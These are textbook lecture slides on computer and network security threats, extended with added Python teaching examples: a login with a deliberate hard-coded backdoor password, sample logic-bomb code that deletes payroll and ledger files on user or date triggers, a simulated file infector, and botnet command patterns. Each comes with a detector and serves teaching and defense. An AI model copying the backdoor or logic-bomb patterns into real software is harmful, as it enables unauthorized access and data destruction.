Data and Computer Communications
Ninth Edition
by William Stallings
Chapter 23 – Computer and Network Security Threats
Data and Computer Communications, Ninth Edition by William Stallings, (c) Pearson Education - Prentice Hall, 2011
Computer and Network Security Threats
The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.
—The Art of War, Sun Tzu
Computer Security
Key objectives: confidentiality, integrity, availability

Confidentiality covers two related concepts:
• Data confidentiality: assures that private or confidential information is not made available or disclosed to unauthorized individuals
• Privacy: assures that individuals control or influence what information related to them may be collected and stored, and by whom and to whom that information may be disclosed

Integrity covers two related concepts:
• Data integrity: assures that information and programs are changed only in a specified and authorized manner
• System integrity: assures that a system performs its intended function in an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the system

Availability
Loss of Security
FIPS PUB 199 identifies the loss of security in each category:
• Confidentiality: unauthorized disclosure of information
• Integrity: unauthorized modification or destruction of information
• Availability: disruption of access to or use of information or an information system
Additional Security Objectives
Some information security professionals feel that two more objectives need to be added:
Threats and Attacks
Computer and Network Assets, with Examples of Threats

Hardware
• Availability: Equipment is stolen or disabled, thus denying service.

Software
• Availability: Programs are deleted, denying access to users.
• Confidentiality: An unauthorized copy of software is made.
• Integrity: A working program is modified, either to cause it to fail during execution or to cause it to do some unintended task.

Data
• Availability: Files are deleted, denying access to users.
• Confidentiality: An unauthorized read of data is performed. An analysis of statistical data reveals underlying data.
• Integrity: Existing files are modified or new files are fabricated.

Communication Lines
• Availability: Messages are destroyed or deleted. Communication lines or networks are rendered unavailable.
• Confidentiality: Messages are read. The traffic pattern of messages is observed.
• Integrity: Messages are modified, delayed, reordered, or duplicated. False messages are fabricated.
Scope of System Security

Hardware
• most vulnerable to attack, least susceptible to automated controls
• threats: accidental damage, intentional damage, theft

Software
• includes operating system, utilities, and application programs
• key threats:

Data
• security concerns with respect to data are broad, encompassing availability, secrecy, and integrity
• major concerns with data have to do with:

Communication Lines & Networks
• network security attack classification:

Active Attacks
Classes of Intruders
• Masquerader: usually an outsider; penetrates a real user's account by pretending to be that user
• Misfeasor: usually an insider; a legitimate user who accesses unauthorized areas
• Clandestine User: outsider or insider; a user who seizes supervisory control of a system in order to avoid prevention, access, and detection controls
Behavior Patterns of Intruders: Hackers and Criminals

Hackers
• usually a high level of competence
• share their findings
• look for targets of opportunity

Criminals
• organized groups of hackers are a common modern threat
• typically young
• usually have specific targets
Behavior Patterns of Intruders: Insiders
Intrusion Techniques
Malicious Software
Categories of Malicious Software
• parasitic: fragments of programs that cannot exist independently of some actual application program, utility, or system program (viruses, logic bombs, backdoors)
• independent: self-contained programs that can be scheduled and run by the operating system (worms, bots)
Terminology of Malicious Programs
• Virus: Malware that, when executed, tries to replicate itself into other executable code; when it succeeds the code is said to be infected. When the infected code is executed, the virus also executes.
• Worm: A computer program that can run independently and can propagate a complete working version of itself onto other hosts on a network.
• Logic bomb: A program inserted into software by an intruder. A logic bomb lies dormant until a predefined condition is met; the program then triggers an unauthorized act.
• Trojan horse: A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the Trojan horse program.
• Backdoor (trapdoor): Any mechanism that bypasses a normal security check; it may allow unauthorized access to functionality.
• Mobile code: Software (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and execute with identical semantics.
• Exploits: Code specific to a single vulnerability or set of vulnerabilities.
• Downloaders: Program that installs other items on a machine that is under attack. Usually, a downloader is sent in an e-mail.
• Auto-rooter: Malicious hacker tools used to break into new machines remotely.
• Kit (virus generator): Set of tools for generating new viruses automatically.
• Spammer programs: Used to send large volumes of unwanted e-mail.
• Flooders: Used to attack networked computer systems with a large volume of traffic to carry out a denial-of-service (DoS) attack.
• Keyloggers: Captures keystrokes on a compromised system.
• Rootkit: Set of hacker tools used after the attacker has broken into a computer system and gained root-level access.
• Zombie, bot: Program installed on an infected machine that is activated to launch attacks on other machines.
• Spyware: Software that collects information from a computer and transmits it to another system.
• Adware: Advertising that is integrated into software. It can result in pop-up ads or redirection of a browser to a commercial site.
Backdoor
• a trapdoor is a secret entry point into a program that bypasses the normal security checks and so can allow unauthorized access to the data
• backdoors are common among the programming community and are used for a variety of maintenance and debugging tasks (maintenance hooks)
• it is important not to allow backdoors into production environments
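The maintenance hook described above, as an added example that is not from the textbook: a login check with a hard-coded "support" password left in beside a hardened version with no out-of-band path, and a small static check that flags the usual shape of such a hook (a variable named like a secret compared against a string literal). The user store, the passwords and the BACKDOOR_SNIPPET source text are constructed for the example.

```python
"""Maintenance-hook backdoor beside a hardened login, plus a static check for
the hook's usual shape. Added example, not from Stallings; the user store,
passwords and BACKDOOR_SNIPPET are constructed."""
import ast
import hashlib
import hmac

def _hash(salt, password):
    return hashlib.sha256(salt + password.encode()).digest()

# Constructed user store: username -> (salt, sha256(salt || password)).
_SALT = b"constructed-salt"
USERS = {"alice": (_SALT, _hash(_SALT, "correct horse"))}

# VULNERABLE: a hook the developer left in for support work. Any username
# gets in with the magic string, whatever the user store says.
def login_with_backdoor(user, password):
    if password == "letmein-maint":          # the maintenance hook
        return True
    rec = USERS.get(user)
    return rec is not None and _hash(rec[0], password) == rec[1]

# HARDENED: the only path in is a matching record. compare_digest keeps the
# comparison constant-time; unknown users still pay the hash cost so the
# response time does not reveal whether the account exists.
def login(user, password):
    rec = USERS.get(user)
    if rec is None:
        _hash(_SALT, password)
        return False
    return hmac.compare_digest(_hash(rec[0], password), rec[1])

# Constructed source text in the vulnerable shape, for the check below.
BACKDOOR_SNIPPET = '''def login_with_backdoor(user, password):
    if password == "letmein-maint":  # maintenance hook
        return True
    return check_password(user, password)
'''

def find_literal_secret_compares(source):
    """Line numbers where a variable named like a secret ('pass', 'token',
    'secret') is compared against a hard-coded string: the usual shape of a
    maintenance hook, and a cheap pre-merge check."""
    keys = ("pass", "token", "secret")
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Compare):
            continue
        sides = [node.left] + node.comparators
        names = [s.id.lower() for s in sides if isinstance(s, ast.Name)]
        literal = any(isinstance(s, ast.Constant) and isinstance(s.value, str)
                      for s in sides)
        if literal and any(k in n for n in names for k in keys):
            hits.append(node.lineno)
    return sorted(hits)
```

The static check is deliberately narrow: it only catches the literal-string form. A hook that compares against a named constant or an environment variable slips past it, which is why a code review of every authentication path before release matters more than the scanner.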
Logic Bomb
• predates viruses and worms
• code embedded in a legitimate program that will "explode" at a given time or when certain conditions are met:
  • presence or absence of certain files
  • particular day of the week or date
  • particular user using the application
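The trigger conditions listed above (date, file presence, current user) all have a recognisable shape in source code: an `if` whose test calls a clock, a filesystem-existence or a user-identity function, guarding a destructive call. The following is an added example, not from the textbook, of a static check that walks a Python module's AST for that shape. The sample module SAMPLE_SOURCE and the two indicator lists are constructed; a real ruleset would be longer and language-specific.

```python
"""Static check for logic-bomb-shaped code: a trigger test (date, file
presence, current user) guarding a destructive call. Added example, not from
Stallings; SAMPLE_SOURCE and the indicator lists are constructed."""
import ast

# Calls whose result typically forms a logic-bomb trigger condition.
TRIGGER_CALLS = {"datetime.now", "date.today", "time.time", "os.path.exists",
                 "getpass.getuser", "os.getlogin"}
# Calls with destructive effect.
PAYLOAD_CALLS = {"os.remove", "os.unlink", "shutil.rmtree", "os.system",
                 "subprocess.call", "subprocess.run"}

# Constructed module under review. nightly_cleanup is a legitimate,
# unconditional cleanup; report and sync carry bomb-shaped conditions.
SAMPLE_SOURCE = '''import os, shutil, getpass
from datetime import date

def nightly_cleanup(tmpdir):
    # legitimate: unconditional cleanup of a temp dir
    shutil.rmtree(tmpdir, ignore_errors=True)

def report():
    if getpass.getuser() != "jsmith":       # fires once the author is gone
        shutil.rmtree("/srv/payroll", ignore_errors=True)

def sync():
    if date.today() >= date(2025, 1, 1) and not os.path.exists("/etc/keepalive"):
        os.remove("/srv/ledger.db")
    print("synced")
'''

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def calls_in(node, names):
    """Set of dotted call names from `names` that occur anywhere under node."""
    found = set()
    for n in ast.walk(node):
        if isinstance(n, ast.Call):
            name = dotted(n.func)
            if name in names:
                found.add(name)
    return found

def find_logic_bombs(source):
    """Return sorted (lineno, trigger, payload) for each `if` whose test uses
    a trigger call and whose body or else-branch contains a destructive call."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.If):
            continue
        triggers = calls_in(node.test, TRIGGER_CALLS)
        payloads = set()
        for stmt in node.body + node.orelse:
            payloads |= calls_in(stmt, PAYLOAD_CALLS)
        if triggers and payloads:
            hits.append((node.lineno, min(triggers), min(payloads)))
    return sorted(hits)
```

Run over SAMPLE_SOURCE it flags the two guarded deletions and leaves the unconditional temp-dir cleanup alone; the point of pairing trigger and payload is to keep the false-positive rate low enough that someone actually reads the hits.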
Trojan Horse
• a program that contains hidden code that, when invoked, causes harm to the system or system infrastructure it was launched from
Mobile Code
• script, macro, or other portable instruction that can be shipped unchanged to a heterogeneous collection of platforms and executed with identical semantics
• transmitted from a remote system to a local system and then executed on the local system without the user's explicit instruction
• acts as a transmission mechanism for a virus, worm, or Trojan horse, and can exploit vulnerabilities such as unauthorized data access
Multiple Threat Malware
• multipartite: capable of infecting multiple types of files
• blended attack: uses multiple methods of infection or transmission to maximize infection speed
• Nimda
  • erroneously referred to as simply a worm
  • uses a combination of vectors such as e-mail, web servers and web clients to propagate and infect
Viruses
• can do anything other programs can do
• attaches itself to a program and executes secretly
• once running it can perform any function allowed by the current user's rights
Virus Lifecycle
Virus Classification
• by target
• by concealment strategy

Target
• boot sector infector: infects a master boot record or boot record and spreads when a system is booted from the disk containing the virus
• file infector: infects files that the operating system or shell consider to be executable
• macro virus: infects files with macro code that is interpreted by an application

Concealment Strategy
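The virus lifecycle and the file-infector class above, as an added simulation that is not from the textbook: a prepending infector that operates only on an in-memory dictionary standing in for a file system, never on real files. Running an infected "executable" runs the virus first (propagation to every other uninfected executable, a trigger on the third run, then control handed back to the host), and a signature scanner finds and strips the prepended body. The marker string, file contents and trigger count are constructed.

```python
"""Simulated prepending file infector over an in-memory 'file system', with a
signature scanner that detects and removes it. Added example, not from
Stallings; the virus only ever touches the FILES dict below, never real files.
The file contents, marker string and trigger count are constructed."""

MARKER = b"#VSIG-1234#"          # the virus's own infection marker / signature
PAYLOAD_AFTER = 3                  # trigger: fire on the 3rd execution

# Constructed file system: name -> bytes. '.exe' names are 'executable'.
FILES = {
    "host.exe": b"HOST: do useful work",
    "tool.exe": b"TOOL: do other work",
    "notes.txt": b"plain data, not a target",
}
STATE = {"runs": 0, "payload_fired": 0}

def is_infected(content):
    return content.startswith(MARKER)

def infect(name):
    """Propagation phase: prepend the virus body to one uninfected executable."""
    c = FILES[name]
    if name.endswith(".exe") and not is_infected(c):
        FILES[name] = MARKER + c
        return True
    return False

def run(name):
    """Execute a file. If it is infected the virus runs first, then the host.
    Until then the virus is dormant: it only acts when its host is run."""
    c = FILES[name]
    if is_infected(c):
        STATE["runs"] += 1
        for other in FILES:                    # propagation: infect every other .exe
            if other != name:
                infect(other)
        if STATE["runs"] >= PAYLOAD_AFTER:     # triggering phase
            STATE["payload_fired"] += 1        # execution phase (a harmless counter here)
        c = c[len(MARKER):]                    # hand control back to the original host
    return c.decode()

def scan():
    """Signature scan: names of files whose content carries MARKER."""
    return sorted(n for n, c in FILES.items() if is_infected(c))

def disinfect():
    """Strip the prepended body from every infected file; returns the count."""
    n = 0
    for name in scan():
        FILES[name] = FILES[name][len(MARKER):]
        n += 1
    return n
```

The scanner works only because the infector copies the same byte string into every victim; that fixed sequence is exactly what a signature is. A polymorphic variant that re-encodes its body on every infection leaves no such constant, which is the concealment problem the next slides are about.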
E-Mail Viruses
• a more recent development in malicious software
• Melissa
  • e-mail virus sends itself to everyone on the mailing list in the user's e-mail package
  • virus does local damage on the user's system
• another virus appeared that activates by merely opening the e-mail that contains the virus, rather than the attachment
Worms
• self-replicating, usually very quickly
• usually performs some unwanted function
• actively seeks out more machines to infect

Worm Phases
• in the propagation phase the worm will
Worm Technology
• Multiplatform: variety of platforms
• Multi-Exploit: variety of penetration schemes
• Ultrafast Spreading: accelerated distribution
• Polymorphic: evades set signatures
• Metamorphic: evades anomaly detectors
• Transport Vehicles: used to spread other distributed attack tools
• Zero Day: exploits a yet unknown vulnerability
Worm Propagation
Bots (AKA Zombie or Drone)
• secretly takes over an internet-connected computer
• launches attacks from that computer that are hard to trace back to the creator

Botnet
• collection of bots that act in a coordinated manner
• has 3 characteristics:
  • bot functionality
  • remote control facility
  • spreading mechanism
Bot Usage
• Distributed Denial of Service attack
• Spamming
• Sniffing traffic
• Keylogging
• Spreading of new malware
• Installing ads (adware and spyware)
• Attacking IRC chat networks
• Manipulation of online polls / games
Remote Control Facility
• distinguishes a bot from a worm: a worm propagates itself, a bot is controlled from some central facility
• (initially) an IRC server: all bots join a specific channel on this server and treat incoming messages as commands
• a control module activates the bots
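The IRC control channel described above is also what makes this generation of botnet detectable on the wire: a host that sends JOIN for a channel and is then sent PRIVMSGs in that channel whose text looks like commands. The following is an added example, not from the textbook, of that detection logic run over a constructed flow log (one IRC line per record, "src -> dst : line"). The log lines, channel names, hosts and the bot command vocabulary are all constructed; a production ruleset would carry a much larger vocabulary and real protocol parsing.

```python
"""Detection over constructed IRC-style traffic: hosts that JOIN a channel and
then receive PRIVMSGs shaped like bot commands. Added example, not from
Stallings; the log lines, channel names and command vocabulary are constructed."""
import re
from collections import defaultdict

# Command words in the style of early IRC bot families; a real ruleset is larger.
BOT_COMMANDS = re.compile(r"^[.!](ddos|syn|udp|scan|update|download|keylog|login)\b", re.I)

# Constructed flow log: "src -> dst : IRC line". One line per message.
LOG = """\
10.0.0.5 -> 203.0.113.9 : NICK [x]-58213
10.0.0.5 -> 203.0.113.9 : JOIN #b0tz
203.0.113.9 -> 10.0.0.5 : :op!c@c PRIVMSG #b0tz :.login secretpw
203.0.113.9 -> 10.0.0.5 : :op!c@c PRIVMSG #b0tz :.scan 10.0.0.0/8 445
203.0.113.9 -> 10.0.0.5 : :op!c@c PRIVMSG #b0tz :.ddos syn 198.51.100.7 80 600
10.0.0.7 -> 203.0.113.9 : JOIN #b0tz
203.0.113.9 -> 10.0.0.7 : :op!c@c PRIVMSG #b0tz :.ddos syn 198.51.100.7 80 600
10.0.0.8 -> 198.51.100.2 : JOIN #linux
198.51.100.2 -> 10.0.0.8 : :bob!b@b PRIVMSG #linux :anyone tried the 6.1 kernel?
"""

LINE = re.compile(r"^(\S+) -> (\S+) : (.*)$")
JOIN = re.compile(r"^JOIN (#\S+)")
PRIVMSG = re.compile(r"^:\S+ PRIVMSG (#\S+) :(.*)$")

def analyse(log, min_commands=2):
    """Return {host: {"channel": c, "commands": [...]}} for hosts that joined a
    channel and were then sent at least min_commands bot-style commands in it."""
    joined = {}                       # host -> channel it joined
    cmds = defaultdict(list)          # host -> command words received
    for raw in log.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        src, dst, msg = m.groups()
        j = JOIN.match(msg)
        if j:
            joined[src] = j.group(1)
            continue
        p = PRIVMSG.match(msg)
        # Only count commands delivered to a host in the channel it joined.
        if p and dst in joined and p.group(1) == joined[dst]:
            if BOT_COMMANDS.match(p.group(2)):
                cmds[dst].append(p.group(2).split()[0].lower())
    return {h: {"channel": joined[h], "commands": c}
            for h, c in cmds.items() if len(c) >= min_commands}
```

With the default threshold 10.0.0.5 is reported (login, scan, ddos) while 10.0.0.7, which received a single command, is not; lowering min_commands to 1 reports both. The ordinary #linux conversation on 10.0.0.8 never matches, which is the check the threshold exists for: one chat line that happens to start with a dot should not page anyone.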
Constructing the Attack Network
• the first step in a botnet attack is for the attacker to infect a number of machines with bot software that will be used to carry out the attack
• essential ingredients:
  • software that can carry out the attack
  • a vulnerability in a large number of systems
  • a strategy for locating and identifying vulnerable machines (scanning / fingerprinting)
Summary
• computer security concepts
• threats, attacks, and assets: hardware, software, data
• intruders: hackers, criminals, insiders
• malicious software: Trojan horse, malware, viruses, worms, and bots